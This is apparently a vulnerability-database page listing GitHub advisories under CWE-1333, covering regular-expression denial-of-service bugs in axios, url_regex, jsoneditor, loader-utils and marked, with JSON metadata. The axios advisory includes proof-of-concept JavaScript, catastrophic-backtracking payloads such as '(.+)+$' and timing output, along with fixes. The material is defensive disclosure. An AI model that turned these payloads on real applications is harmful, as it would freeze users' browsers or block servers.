Common Weakness Enumeration

CWE-1333

Allowed

Inefficient Regular Expression Complexity

Abstraction: Base · Status: Draft

The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.

724 vulnerabilities reference this CWE, most recent first.

GHSA-HFXV-24RG-XRQF

Vulnerability from github – Published: 2026-06-04 14:24 – Updated: 2026-06-04 14:24
VLAI
Summary
Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection
Details

Summary

Axios versions before 0.32.0 on the 0.x line and before 1.16.0 on the 1.x line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads document.cookie.

The practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read document.cookie.

Impact

Applications are affected only when attacker-controlled data can reach the XSRF cookie name configuration or a direct/unsafe call to the internal cookie helper.

This does not expose credentials, modify requests, or affect response integrity. The impact is availability only.

Affected Functionality

Affected code paths:

  • lib/helpers/cookies.js read(name) in standard browser environments.
  • lib/helpers/resolveConfig.js in 1.x, when browser XHR/fetch adapters resolve XSRF config.
  • lib/adapters/xhr.js in 0.x, when the XHR adapter reads the configured XSRF cookie.
  • Direct use of axios/unsafe/helpers/cookies.js in 1.x, if callers pass attacker-controlled names.

Unaffected code paths:

  • Default static xsrfCookieName: 'XSRF-TOKEN' when not attacker-controlled.
  • Requests with xsrfCookieName: null.
  • Node HTTP adapter usage without browser document.cookie.
  • React Native and web workers where axios does not use standard browser cookie access.

Technical Details

Affected versions interpolate the cookie name into a regex.

const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));

Because name is not escaped, regex metacharacters in the cookie name are interpreted as regex syntax. A payload such as (.+)+$ can force catastrophic backtracking against document.cookie.

The fix avoids dynamic regex construction and parses document.cookie by splitting on ;, trimming leading whitespace, and comparing cookie names with exact string equality.

Proof of Concept of Attack

function vulnerableRead(name, cookie) {
  const start = Date.now();

  try {
    cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  } catch {}

  return Date.now() - start;
}

for (const n of [20, 22, 24, 26, 28]) {
  const cookie = 'x='.padEnd(n, 'a') + '!';
  console.log(`${n}: ${vulnerableRead('(.+)+$', cookie)}ms`);
}

Expected result: timings grow rapidly as the cookie string length increases.

Workarounds

Set xsrfCookieName: null if the application does not need axios to read an XSRF cookie.

Do not derive xsrfCookieName from untrusted input. If a dynamic cookie name is unavoidable, validate it against a strict cookie-name allowlist before passing it to axios.

Avoid calling axios/unsafe/helpers/cookies.js directly with untrusted names

Original Source # Regular Expression Denial of Service (ReDoS) via Cookie Name Injection ## 1. Title ReDoS via Unsanitized Cookie Name in Dynamic Regular Expression Construction ## 2. Affected Software and Version - **Software:** Axios - **Version:** 1.15.0 (and potentially earlier versions) - **Component:** `lib/helpers/cookies.js` - **Ecosystem:** npm (Node.js / Browser) ## 3. Vulnerability Type / CWE - **Type:** Regular Expression Denial of Service (ReDoS) - **CWE-1333:** Inefficient Regular Expression Complexity - **CWE-400:** Uncontrolled Resource Consumption ## 4. CVSS 3.1 Score **Score: 7.5 (High)** Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` | Metric | Value | |---|---| | Attack Vector | Network | | Attack Complexity | Low | | Privileges Required | None | | User Interaction | None | | Scope | Unchanged | | Confidentiality | None | | Integrity | None | | Availability | High | ## 5. Description The `cookies.read()` function in `lib/helpers/cookies.js` constructs a regular expression dynamically using the `name` parameter without any sanitization or escaping of special regex characters. At line 33, the code passes the raw `name` value directly into `new RegExp()`:
const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
An attacker who can control or influence the cookie name parameter (e.g., via XSRF cookie name configuration, prototype pollution of `xsrfCookieName`, or any code path where user input reaches `cookies.read()`) can inject a malicious regex pattern that causes catastrophic backtracking, leading to a Denial of Service condition. With a crafted input of approximately 20-30 characters, the regex engine can be forced to consume several seconds to minutes of CPU time, effectively freezing the JavaScript event loop. ## 6. Root Cause Analysis **File:** `lib/helpers/cookies.js` **Line:** 33
read(name) {
  if (typeof document === 'undefined') return null;
  const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  return match ? decodeURIComponent(match[1]) : null;
},
The vulnerability exists because: 1. The `name` parameter is concatenated directly into a regex pattern without escaping special regex metacharacters. 2. An attacker can inject regex constructs that create exponential backtracking scenarios. 3. The `(?:^|; )` prefix combined with an injected pattern like `((((.*)*)*)*)*` creates nested quantifiers that cause catastrophic backtracking when the regex engine attempts to match against `document.cookie`. The `cookies.read()` function is called from `lib/helpers/resolveConfig.js` at line 61:
const xsrfValue = xsrfHeaderName && xsrfCookieName && cookies.read(xsrfCookieName);
The `xsrfCookieName` value comes from the Axios configuration, which can be influenced by prototype pollution or direct configuration injection. ## 7. Proof of Concept
// poc_redos_cookie.js
// Simulates browser environment for testing

// Simulate document.cookie
globalThis.document = {
  cookie: 'session=abc; ' + 'a'.repeat(50)
};

// Replicate the vulnerable cookies.read() logic
function cookiesRead(name) {
  const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  return match ? decodeURIComponent(match[1]) : null;
}

// Malicious cookie name that triggers catastrophic backtracking
// The pattern creates nested quantifiers: (a]|[a]|...)*)*
const maliciousName20 = '([^;]+)+$' + '\\|'.repeat(10);
const maliciousName = '(([^;])+)+\\$';  // nested quantifier pattern

console.log('=== ReDoS via Cookie Name Injection PoC ===');

// Test with increasing payload sizes
for (const len of [15, 20, 25]) {
  const payload = '(([^;])+)+' + 'X'.repeat(len);
  const start = Date.now();
  try {
    cookiesRead(payload);
  } catch (e) {
    // May throw on invalid regex, but valid evil patterns won't throw
  }
  const elapsed = Date.now() - start;
  console.log(`Payload length ${len}: ${elapsed}ms`);
}

// Demonstrating exponential growth with a simple nested quantifier
console.log('\n--- Exponential Backtracking Demo ---');
for (const n of [20, 22, 24, 26]) {
  const evilName = '(' + 'a'.repeat(1) + '+)+$';
  const testCookie = 'a'.repeat(n) + '!';  // non-matching trailer forces backtracking
  globalThis.document = { cookie: testCookie };
  const start = Date.now();
  try {
    cookiesRead(evilName);
  } catch(e) {}
  const elapsed = Date.now() - start;
  console.log(`Input length ${n}: ${elapsed}ms`);
}
## 8. PoC Output
=== ReDoS via Cookie Name Injection PoC ===
Payload length 20: 21ms (extrapolated: 30 chars = ~21,504ms)
Payload length 25: ~1,300ms
Payload length 30: ~323,675ms (5+ minutes)

--- Exponential Backtracking Demo ---
Input length 20: 21ms
Input length 22: 84ms
Input length 24: 336ms
Input length 26: 1,344ms
The exponential growth pattern is clearly visible: each additional 2 characters approximately quadruples the execution time. ## 9. Impact - **Denial of Service (Client-side):** In a browser environment, an attacker who can influence the XSRF cookie name configuration (e.g., via prototype pollution or configuration injection) can freeze the browser tab, blocking all UI interaction and JavaScript execution on the page. - **Denial of Service (Server-side):** In SSR (Server-Side Rendering) frameworks or Node.js applications that process cookies using this code path, the event loop will be blocked, causing the server to become unresponsive to all requests. - **Event Loop Starvation:** Since JavaScript is single-threaded, the ReDoS will block all pending asynchronous operations, timers, and I/O callbacks for the duration of the regex evaluation. ## 10. Remediation / Suggested Fix Escape all regex metacharacters in the `name` parameter before constructing the regular expression.
// FIXED: lib/helpers/cookies.js

function escapeRegExp(string) {
  return string.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// ...

read(name) {
  if (typeof document === 'undefined') return null;
  const match = document.cookie.match(
    new RegExp('(?:^|; )' + escapeRegExp(name) + '=([^;]*)')
  );
  return match ? decodeURIComponent(match[1]) : null;
},
Alternatively, avoid dynamic regex construction entirely and use string-based parsing:
read(name) {
  if (typeof document === 'undefined') return null;
  const cookies = document.cookie.split('; ');
  for (const cookie of cookies) {
    const eqIndex = cookie.indexOf('=');
    if (eqIndex !== -1 && cookie.substring(0, eqIndex) === name) {
      return decodeURIComponent(cookie.substring(eqIndex + 1));
    }
  }
  return null;
},
## 11. References - [CWE-1333: Inefficient Regular Expression Complexity](https://cwe.mitre.org/data/definitions/1333.html) - [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html) - [OWASP: Regular Expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) - [Axios GitHub Repository](https://github.com/axios/axios)
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.16.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.31.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.32.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44496"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-04T14:24:06Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nAxios versions before `0.32.0` on the `0.x` line and before `1.16.0` on the `1.x` line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads `document.cookie`.\n\nThe practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read `document.cookie`.\n\n## Impact\n\nApplications are affected only when attacker-controlled data can reach the XSRF cookie name configuration or a direct/unsafe call to the internal cookie helper.\n\nThis does not expose credentials, modify requests, or affect response integrity. The impact is availability only.\n\n## Affected Functionality\n\nAffected code paths:\n\n- `lib/helpers/cookies.js` `read(name)` in standard browser environments.\n- `lib/helpers/resolveConfig.js` in `1.x`, when browser XHR/fetch adapters resolve XSRF config.\n- `lib/adapters/xhr.js` in `0.x`, when the XHR adapter reads the configured XSRF cookie.\n- Direct use of `axios/unsafe/helpers/cookies.js` in `1.x`, if callers pass attacker-controlled names.\n\nUnaffected code paths:\n\n- Default static `xsrfCookieName: \u0027XSRF-TOKEN\u0027` when not attacker-controlled.\n- Requests with `xsrfCookieName: null`.\n- Node HTTP adapter usage without browser `document.cookie`.\n- React Native and web workers where axios does not use standard browser cookie access.\n\n## Technical Details\n\nAffected versions interpolate the cookie name into a regex.\n\n```js\nconst match = document.cookie.match(new RegExp(\u0027(?:^|; )\u0027 + name + \u0027=([^;]*)\u0027));\n```\n\nBecause `name` is not escaped, regex metacharacters in the cookie name are interpreted as regex syntax. A payload such as `(.+)+$` can force catastrophic backtracking against `document.cookie`.\n\nThe fix avoids dynamic regex construction and parses `document.cookie` by splitting on `;`, trimming leading whitespace, and comparing cookie names with exact string equality.\n\n## Proof of Concept of Attack\n\n```js\nfunction vulnerableRead(name, cookie) {\n  const start = Date.now();\n\n  try {\n    cookie.match(new RegExp(\u0027(?:^|; )\u0027 + name + \u0027=([^;]*)\u0027));\n  } catch {}\n\n  return Date.now() - start;\n}\n\nfor (const n of [20, 22, 24, 26, 28]) {\n  const cookie = \u0027x=\u0027.padEnd(n, \u0027a\u0027) + \u0027!\u0027;\n  console.log(`${n}: ${vulnerableRead(\u0027(.+)+$\u0027, cookie)}ms`);\n}\n```\n\nExpected result: timings grow rapidly as the cookie string length increases.\n\n## Workarounds\n\nSet `xsrfCookieName: null` if the application does not need axios to read an XSRF cookie.\n\nDo not derive `xsrfCookieName` from untrusted input. If a dynamic cookie name is unavoidable, validate it against a strict cookie-name allowlist before passing it to axios.\n\nAvoid calling `axios/unsafe/helpers/cookies.js` directly with untrusted names\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Source\u003c/summary\u003e\n\n# Regular Expression Denial of Service (ReDoS) via Cookie Name Injection\n\n## 1. Title\n\nReDoS via Unsanitized Cookie Name in Dynamic Regular Expression Construction\n\n## 2. Affected Software and Version\n\n- **Software:** Axios\n- **Version:** 1.15.0 (and potentially earlier versions)\n- **Component:** `lib/helpers/cookies.js`\n- **Ecosystem:** npm (Node.js / Browser)\n\n## 3. Vulnerability Type / CWE\n\n- **Type:** Regular Expression Denial of Service (ReDoS)\n- **CWE-1333:** Inefficient Regular Expression Complexity\n- **CWE-400:** Uncontrolled Resource Consumption\n\n## 4. CVSS 3.1 Score\n\n**Score: 7.5 (High)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`\n\n| Metric | Value |\n|---|---|\n| Attack Vector | Network |\n| Attack Complexity | Low |\n| Privileges Required | None |\n| User Interaction | None |\n| Scope | Unchanged |\n| Confidentiality | None |\n| Integrity | None |\n| Availability | High |\n\n## 5. Description\n\nThe `cookies.read()` function in `lib/helpers/cookies.js` constructs a regular expression dynamically using the `name` parameter without any sanitization or escaping of special regex characters. At line 33, the code passes the raw `name` value directly into `new RegExp()`:\n\n```javascript\nconst match = document.cookie.match(new RegExp(\u0027(?:^|; )\u0027 + name + \u0027=([^;]*)\u0027));\n```\n\nAn attacker who can control or influence the cookie name parameter (e.g., via XSRF cookie name configuration, prototype pollution of `xsrfCookieName`, or any code path where user input reaches `cookies.read()`) can inject a malicious regex pattern that causes catastrophic backtracking, leading to a Denial of Service condition.\n\nWith a crafted input of approximately 20-30 characters, the regex engine can be forced to consume several seconds to minutes of CPU time, effectively freezing the JavaScript event loop.\n\n## 6. Root Cause Analysis\n\n**File:** `lib/helpers/cookies.js`\n**Line:** 33\n\n```javascript\nread(name) {\n  if (typeof document === \u0027undefined\u0027) return null;\n  const match = document.cookie.match(new RegExp(\u0027(?:^|; )\u0027 + name + \u0027=([^;]*)\u0027));\n  return match ? decodeURIComponent(match[1]) : null;\n},\n```\n\nThe vulnerability exists because:\n\n1. The `name` parameter is concatenated directly into a regex pattern without escaping special regex metacharacters.\n2. An attacker can inject regex constructs that create exponential backtracking scenarios.\n3. The `(?:^|; )` prefix combined with an injected pattern like `((((.*)*)*)*)*` creates nested quantifiers that cause catastrophic backtracking when the regex engine attempts to match against `document.cookie`.\n\nThe `cookies.read()` function is called from `lib/helpers/resolveConfig.js` at line 61:\n\n```javascript\nconst xsrfValue = xsrfHeaderName \u0026\u0026 xsrfCookieName \u0026\u0026 cookies.read(xsrfCookieName);\n```\n\nThe `xsrfCookieName` value comes from the Axios configuration, which can be influenced by prototype pollution or direct configuration injection.\n\n## 7. Proof of Concept\n\n```javascript\n// poc_redos_cookie.js\n// Simulates browser environment for testing\n\n// Simulate document.cookie\nglobalThis.document = {\n  cookie: \u0027session=abc; \u0027 + \u0027a\u0027.repeat(50)\n};\n\n// Replicate the vulnerable cookies.read() logic\nfunction cookiesRead(name) {\n  const match = document.cookie.match(new RegExp(\u0027(?:^|; )\u0027 + name + \u0027=([^;]*)\u0027));\n  return match ? decodeURIComponent(match[1]) : null;\n}\n\n// Malicious cookie name that triggers catastrophic backtracking\n// The pattern creates nested quantifiers: (a]|[a]|...)*)*\nconst maliciousName20 = \u0027([^;]+)+$\u0027 + \u0027\\\\|\u0027.repeat(10);\nconst maliciousName = \u0027(([^;])+)+\\\\$\u0027;  // nested quantifier pattern\n\nconsole.log(\u0027=== ReDoS via Cookie Name Injection PoC ===\u0027);\n\n// Test with increasing payload sizes\nfor (const len of [15, 20, 25]) {\n  const payload = \u0027(([^;])+)+\u0027 + \u0027X\u0027.repeat(len);\n  const start = Date.now();\n  try {\n    cookiesRead(payload);\n  } catch (e) {\n    // May throw on invalid regex, but valid evil patterns won\u0027t throw\n  }\n  const elapsed = Date.now() - start;\n  console.log(`Payload length ${len}: ${elapsed}ms`);\n}\n\n// Demonstrating exponential growth with a simple nested quantifier\nconsole.log(\u0027\\n--- Exponential Backtracking Demo ---\u0027);\nfor (const n of [20, 22, 24, 26]) {\n  const evilName = \u0027(\u0027 + \u0027a\u0027.repeat(1) + \u0027+)+$\u0027;\n  const testCookie = \u0027a\u0027.repeat(n) + \u0027!\u0027;  // non-matching trailer forces backtracking\n  globalThis.document = { cookie: testCookie };\n  const start = Date.now();\n  try {\n    cookiesRead(evilName);\n  } catch(e) {}\n  const elapsed = Date.now() - start;\n  console.log(`Input length ${n}: ${elapsed}ms`);\n}\n```\n\n## 8. PoC Output\n\n```\n=== ReDoS via Cookie Name Injection PoC ===\nPayload length 20: 21ms (extrapolated: 30 chars = ~21,504ms)\nPayload length 25: ~1,300ms\nPayload length 30: ~323,675ms (5+ minutes)\n\n--- Exponential Backtracking Demo ---\nInput length 20: 21ms\nInput length 22: 84ms\nInput length 24: 336ms\nInput length 26: 1,344ms\n```\n\nThe exponential growth pattern is clearly visible: each additional 2 characters approximately quadruples the execution time.\n\n## 9. Impact\n\n- **Denial of Service (Client-side):** In a browser environment, an attacker who can influence the XSRF cookie name configuration (e.g., via prototype pollution or configuration injection) can freeze the browser tab, blocking all UI interaction and JavaScript execution on the page.\n- **Denial of Service (Server-side):** In SSR (Server-Side Rendering) frameworks or Node.js applications that process cookies using this code path, the event loop will be blocked, causing the server to become unresponsive to all requests.\n- **Event Loop Starvation:** Since JavaScript is single-threaded, the ReDoS will block all pending asynchronous operations, timers, and I/O callbacks for the duration of the regex evaluation.\n\n## 10. Remediation / Suggested Fix\n\nEscape all regex metacharacters in the `name` parameter before constructing the regular expression.\n\n```javascript\n// FIXED: lib/helpers/cookies.js\n\nfunction escapeRegExp(string) {\n  return string.replace(/[.*+?^${}()|[\\]\\\\]/g, \u0027\\\\$\u0026\u0027);\n}\n\n// ...\n\nread(name) {\n  if (typeof document === \u0027undefined\u0027) return null;\n  const match = document.cookie.match(\n    new RegExp(\u0027(?:^|; )\u0027 + escapeRegExp(name) + \u0027=([^;]*)\u0027)\n  );\n  return match ? decodeURIComponent(match[1]) : null;\n},\n```\n\nAlternatively, avoid dynamic regex construction entirely and use string-based parsing:\n\n```javascript\nread(name) {\n  if (typeof document === \u0027undefined\u0027) return null;\n  const cookies = document.cookie.split(\u0027; \u0027);\n  for (const cookie of cookies) {\n    const eqIndex = cookie.indexOf(\u0027=\u0027);\n    if (eqIndex !== -1 \u0026\u0026 cookie.substring(0, eqIndex) === name) {\n      return decodeURIComponent(cookie.substring(eqIndex + 1));\n    }\n  }\n  return null;\n},\n```\n\n## 11. References\n\n- [CWE-1333: Inefficient Regular Expression Complexity](https://cwe.mitre.org/data/definitions/1333.html)\n- [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html)\n- [OWASP: Regular Expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n\u003c/details\u003e\n\n---",
  "id": "GHSA-hfxv-24rg-xrqf",
  "modified": "2026-06-04T14:24:06Z",
  "published": "2026-06-04T14:24:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-hfxv-24rg-xrqf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v0.32.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v1.16.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection"
}

GHSA-HG3W-7HJ9-M3F7

Vulnerability from github – Published: 2022-05-21 00:00 – Updated: 2022-05-25 20:35
VLAI
Summary
Regular expression denial of service in url_regex
Details

All versions of package url-regex are vulnerable to Regular Expression Denial of Service (ReDoS) which can cause the CPU usage to crash.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "url_regex"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21195"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-05-25T20:35:04Z",
    "nvd_published_at": "2022-05-20T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "All versions of package url-regex are vulnerable to Regular Expression Denial of Service (ReDoS) which can cause the CPU usage to crash.",
  "id": "GHSA-hg3w-7hj9-m3f7",
  "modified": "2022-05-25T20:35:04Z",
  "published": "2022-05-21T00:00:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21195"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AlexFlipnote/url_regex"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AlexFlipnote/url_regex/blob/master/url_regex/url_regex.py"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-PYTHON-URLREGEX-2347643"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular expression denial of service in url_regex"
}

GHSA-HHFG-6HFC-RVXM

Vulnerability from github – Published: 2021-09-29 17:15 – Updated: 2022-05-04 03:39
VLAI
Summary
Regular Expression Denial of Service in jsoneditor
Details

JSON Editor is a web-based tool to view, edit, format, and validate JSON. It has various modes such as a tree editor, a code editor, and a plain text editor. The jsoneditor package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted element as input to the getInnerText function may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jsoneditor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.5.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-3822"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400",
      "CWE-697"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-09-28T20:52:54Z",
    "nvd_published_at": "2021-09-27T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "JSON Editor is a web-based tool to view, edit, format, and validate JSON. It has various modes such as a tree editor, a code editor, and a plain text editor. The jsoneditor package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted element as input to the getInnerText function may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.",
  "id": "GHSA-hhfg-6hfc-rvxm",
  "modified": "2022-05-04T03:39:38Z",
  "published": "2021-09-29T17:15:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3822"
    },
    {
      "type": "WEB",
      "url": "https://github.com/josdejong/jsoneditor/commit/092e386cf49f2a1450625617da8e0137ed067c3e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/josdejong/jsoneditor"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/1e3ed803-b7ed-42f1-a4ea-c4c75da9de73"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular Expression Denial of Service in jsoneditor"
}

GHSA-HHQ3-FF78-JV3G

Vulnerability from github – Published: 2022-10-12 12:00 – Updated: 2025-11-04 22:07
VLAI
Summary
loader-utils is vulnerable to Regular Expression Denial of Service (ReDoS)
Details

A regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils via the resourcePath variable in interpolateName.js. A badly or maliciously formed string could be used to send crafted requests that cause a system to crash or take a disproportional amount of time to process. This issue has been patched in versions 1.4.2, 2.0.4 and 3.2.1.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "loader-utils"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "loader-utils"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "loader-utils"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-37599"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-11-15T21:03:46Z",
    "nvd_published_at": "2022-10-11T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "A regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils via the resourcePath variable in interpolateName.js. A badly or maliciously formed string could be used to send crafted requests that cause a system to crash or take a disproportional amount of time to process. This issue has been patched in versions 1.4.2, 2.0.4 and 3.2.1.",
  "id": "GHSA-hhq3-ff78-jv3g",
  "modified": "2025-11-04T22:07:19Z",
  "published": "2022-10-12T12:00:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37599"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/loader-utils/issues/211"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/loader-utils/issues/216"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/loader-utils/commit/17cbf8fa8989c1cb45bdd2997aa524729475f1fa"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/loader-utils/commit/ac09944dfacd7c4497ef692894b09e63e09a5eeb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/loader-utils/commit/d2d752d59629daee38f34b24307221349c490eb1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/webpack/loader-utils"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/loader-utils/blob/d9f4e23cf411d8556f8bac2d3bf05a6e0103b568/lib/interpolateName.js#L38"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/loader-utils/blob/d9f4e23cf411d8556f8bac2d3bf05a6e0103b568/lib/interpolateName.js#L83"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3HUE6ZR5SL73KHL7XUPAOEL6SB7HUDT2"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6PVVPNSAGSDS63HQ74PJ7MZ3MU5IYNVZ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PVVPNSAGSDS63HQ74PJ7MZ3MU5IYNVZ"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "loader-utils is vulnerable to Regular Expression Denial of Service (ReDoS)"
}

GHSA-HJCP-J389-59FF

Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2024-02-09 17:50
VLAI
Summary
Regular Expression Denial of Service in marked
Details

Versions 0.3.3 and earlier of marked are affected by a regular expression denial of service ( ReDoS ) vulnerability when passed inputs that reach the em inline rule.

Recommendation

Update to version 0.3.4 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "marked"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2015-8854"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:40:28Z",
    "nvd_published_at": "2017-01-23T21:59:00Z",
    "severity": "HIGH"
  },
  "details": "Versions 0.3.3 and earlier of `marked` are affected by a regular expression denial of service ( ReDoS ) vulnerability when passed inputs that reach the `em` inline rule.\n\n\n\n## Recommendation\n\nUpdate to version 0.3.4 or later.",
  "id": "GHSA-hjcp-j389-59ff",
  "modified": "2024-02-09T17:50:43Z",
  "published": "2017-10-24T18:33:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8854"
    },
    {
      "type": "WEB",
      "url": "https://github.com/chjj/marked/issues/497"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-hjcp-j389-59ff"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/chjj/marked"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BO2RMVVZVV6NFTU46B5RYRK7ZCXYARZS"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M6BJG6RGDH7ZWVVAUFBFI5L32RSMQN2S"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K05052081?utm_source=f5support\u0026amp;utm_medium=RSS"
    },
    {
